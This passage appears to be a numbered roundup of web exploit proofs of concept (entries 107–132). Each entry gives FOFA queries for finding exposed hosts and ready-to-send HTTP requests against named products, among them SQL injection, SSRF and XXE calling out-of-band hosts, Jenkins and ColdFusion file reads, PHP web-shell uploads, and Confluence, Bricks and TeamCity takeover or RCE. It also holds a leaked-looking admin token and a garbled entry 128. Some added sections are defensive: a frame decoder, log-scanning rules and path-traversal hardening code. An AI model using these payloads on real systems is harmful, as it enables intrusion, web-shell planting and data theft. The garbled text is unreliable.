Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Upload side (the body is shown as a Python bytes literal of the raw CLI frames):
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

Download side (same Session value):
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The download side returns the CLI's error text, which echoes the lines of the file that the @/etc/passwd argument was expanded into:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

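Added example, not part of the original list or of Jenkins: a Python decoder for the upload body above, so that a proxy or IDS can see the CLI arguments instead of opaque bytes. Each frame is a 4-byte big-endian length, a 1-byte opcode and that many payload bytes; ARG, LOCALE and ENCODING payloads are Java DataOutputStream.writeUTF() strings (2-byte length prefix). The opcode table follows the ordinal order of Jenkins' PlainCLIProtocol.Op, which the frames above also bear out (0 carries "help" and "@/etc/passwd", 2 carries "GBK", 1 carries "en_US", 3 starts the command). The detection rule is the CVE's root cause: args4j expands any argument beginning with '@' into the named file's contents, so an ARG starting with '@' is what to alert on. The body is the page's own PoC; function names are mine.

```python
import struct

# Opcode ordinals of Jenkins' PlainCLIProtocol.Op (assumed from its enum order;
# the frames on this page match: 0=ARG, 2=ENCODING, 1=LOCALE, 3=START).
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START", 4: "EXIT",
       5: "STDIN", 6: "END_STDIN", 7: "STDOUT", 8: "STDERR"}


def parse_frames(body: bytes):
    """Split an upload-side body into (op, payload) frames: [int32 len][byte op][len bytes]."""
    frames, i = [], 0
    while i < len(body):
        if i + 5 > len(body):
            raise ValueError("truncated frame header at offset %d" % i)
        (length,) = struct.unpack(">I", body[i:i + 4])
        op = body[i + 4]
        start, end = i + 5, i + 5 + length
        if end > len(body):
            raise ValueError("truncated frame payload at offset %d" % i)
        frames.append((OPS.get(op, "UNKNOWN(%d)" % op), body[start:end]))
        i = end
    return frames


def decode_utf(payload: bytes) -> str:
    """ARG/LOCALE/ENCODING payloads are DataOutputStream.writeUTF(): 2-byte length + UTF-8."""
    (n,) = struct.unpack(">H", payload[:2])
    return payload[2:2 + n].decode("utf-8")


def cli_args(body: bytes):
    """The command line the CLI will parse, in order."""
    return [decode_utf(p) for op, p in parse_frames(body) if op == "ARG"]


def at_file_args(body: bytes):
    """CVE-2024-23897: args4j expands an '@path' argument to the file's contents,
    so any ARG starting with '@' is the thing to alert on."""
    return [a for a in cli_args(body) if a.startswith("@")]


# The upload body from the PoC above, as raw bytes.
POC_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
            b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
            b"\x00\x00\x00\x05\x02\x00\x03GBK"
            b"\x00\x00\x00\x07\x01\x00\x05en_US"
            b"\x00\x00\x00\x00\x03")

if __name__ == "__main__":
    for op, payload in parse_frames(POC_BODY):
        text = decode_utf(payload) if op in ("ARG", "LOCALE", "ENCODING") else payload
        print(op, text)
    print("@file arguments:", at_file_args(POC_BODY))
```

Because the upload and download halves are separate HTTP requests tied together only by the Session header, a detector has to inspect the upload body; the download request carries nothing but the session id.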
110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce from the front page
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress JS Support Ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


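Added example, not part of the original list: most of the GET-based PoCs above (entries 91, 101, 105 to 108, 110, 111, 113, 114 and 117) leave their whole payload in the request line, so a defender can sweep existing access logs for them. The Python below extracts the request target from combined-format log lines, URL-decodes it twice so single- and double-encoded variants look alike, and runs six rules drawn from those PoCs: the ';' path-parameter traversal ("..;/") used against Hikvision and GoAnywhere, plain "../" traversal, MySQL error-based injection (updatexml/extractvalue), time-based injection (sleep/benchmark), a file:// URL in a parameter, and a shell metacharacter followed by a download/ping command. The log lines are constructed for this example (hosts, times and client IPs are made up; the targets are the page's own). Rule names and functions are mine; a real deployment would tune the patterns to its own application paths.

```python
import re
from urllib.parse import unquote_plus

# (rule name, pattern) pairs; applied to the decoded request target.
RULES = [
    ("traversal-pathparam", re.compile(r"\.\.;/")),                            # Tomcat/Jetty ';' path parameter
    ("traversal-dotdot",    re.compile(r"(?:^|[/=])\.\./")),
    ("sqli-error",          re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("sqli-time",           re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("file-scheme",         re.compile(r"file://", re.I)),
    ("cmd-inject",          re.compile(r"[;|`]\s*(?:curl|wget|ping|bash|sh|nc)\b", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS)\s+(\S+)\s+HTTP/')


def normalize_target(target: str) -> str:
    """Decode twice so single- and double-encoded payloads compare the same."""
    return unquote_plus(unquote_plus(target))


def classify(target: str):
    """Names of every rule the (decoded) request target trips, in RULES order."""
    decoded = normalize_target(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text: str):
    """(line number, [rule names]) for each combined-format log line that trips a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        names = classify(m.group(1))
        if names:
            hits.append((lineno, names))
    return hits


# Constructed sample log: targets taken from the PoCs above, everything else made up.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1432
10.0.0.5 - - [05/Jun/2024:10:00:02 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 51
10.0.0.5 - - [05/Jun/2024:10:00:03 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 212
10.0.0.5 - - [05/Jun/2024:10:00:04 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 9876
10.0.0.5 - - [05/Jun/2024:10:00:05 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 88
10.0.0.5 - - [05/Jun/2024:10:00:06 +0800] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1432
10.0.0.5 - - [05/Jun/2024:10:00:07 +0800] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" 200 3
10.0.0.9 - - [05/Jun/2024:10:00:08 +0800] "GET /wp-content/themes/bricks/assets/css/frontend.min.css HTTP/1.1" 200 40211
"""

if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG):
        print(lineno, ", ".join(names))
```

Time-based probes (entries 111, 114, 117) also show up as a cluster of slow responses from one client; pairing this rule output with the response-time column is the cheapest way to separate a real probe from a stray "sleep" in a search query.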
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then request /home/src.php (the txt_path field chooses where the file is written).

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. Byzoro Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded (encoded, not encrypted): c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-H
K;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection (text-inline.vm) remote code execution
CVE-2023-22527
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The injected OGNL executes id and returns its output in the X-Cmd-Response response header; note the \u00XX escapes used to smuggle the quotes and brackets past input filtering.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
Public PoC: https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; from there system commands can be executed.

126. aiohttp static file path traversal
CVE-2024-23334
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

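The request above works because the static handler joins the URL remainder onto its directory and serves the result without confirming that the resolved file is still inside that directory. What follows is an added example, not aiohttp's code and not part of the original roundup, showing the vulnerable shape beside the hardened check; the static root /srv/comfyui/web and the /static/ mount point are assumed for illustration. The same containment test is what the TeamCity /res/../admin/ and RaidenMAILD /webeditor/../ requests listed later in this roundup would have needed.

```python
import os
import posixpath
from typing import Optional
from urllib.parse import unquote

# Added example. Assumed static root for a ComfyUI-style deployment; not from the page.
STATIC_ROOT = "/srv/comfyui/web"


def vulnerable_static_path(root: str, rel_path: str) -> str:
    """The shape of the bug: join the URL remainder onto the root and serve the
    result. ".." segments survive the join, so the PoC path resolves to
    /etc/passwd, well outside the root."""
    return posixpath.normpath(posixpath.join(root, unquote(rel_path).lstrip("/")))


def safe_static_path(root: str, rel_path: str) -> Optional[str]:
    """Hardened form: decode, normalize, then require that the result is still
    inside root. Returns None for anything that escapes."""
    rel = unquote(rel_path)
    if "\x00" in rel:  # NUL truncation tricks in C-backed file APIs
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, rel.lstrip("/")))
    # commonpath compares by path component, so /srv/comfyui/web2 is not
    # mistaken for a child of /srv/comfyui/web the way startswith() would be.
    if posixpath.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


def safe_static_path_fs(root: str, rel_path: str) -> Optional[str]:
    """Same check against a live filesystem: resolve symlinks on both sides
    first, otherwise a symlink inside root can still point outside it."""
    real_root = os.path.realpath(root)
    candidate = safe_static_path(real_root, rel_path)
    if candidate is None:
        return None
    real = os.path.realpath(candidate)
    return real if os.path.commonpath([real_root, real]) == real_root else None


def strip_route_prefix(request_path: str, prefix: str = "/static/") -> Optional[str]:
    """Routers hand the static handler only the remainder after the mount
    point; this mirrors that so the PoC path can be fed in as received."""
    return request_path[len(prefix):] if request_path.startswith(prefix) else None


if __name__ == "__main__":
    rel = strip_route_prefix("/static/../../../../../etc/passwd")
    print("vulnerable handler would open:", vulnerable_static_path(STATIC_ROOT, rel))
    print("hardened handler returns:", safe_static_path(STATIC_ROOT, rel))
```

safe_static_path is pure string logic so it can be unit-tested without a filesystem; safe_static_path_fs adds the realpath step that matters once symlinks are followed, which is the condition under which the aiohttp traversal applied.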

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS or HTTP lookup for the entity host arriving at the out-of-band listener confirms that the parser resolves external entities.

128. Adobe ColdFusion 反序列化+ J4 X) C1 U7 ~
CVE-2023-38203
2 ~4 g" ~' e" Y9 p0 UAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
/ }# \& z& E) j! WFOFA:app="Adobe-ColdFusion"* P" {6 f0 x) q" s4 V% v& S2 z
PAYLOAD
# H: `8 `/ k" X1 V5 U
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid from the response
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in a request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity <= 2023.11.3 authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path traversal to authenticated pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Public exploit script: CVE-2024-27198-RCE.py

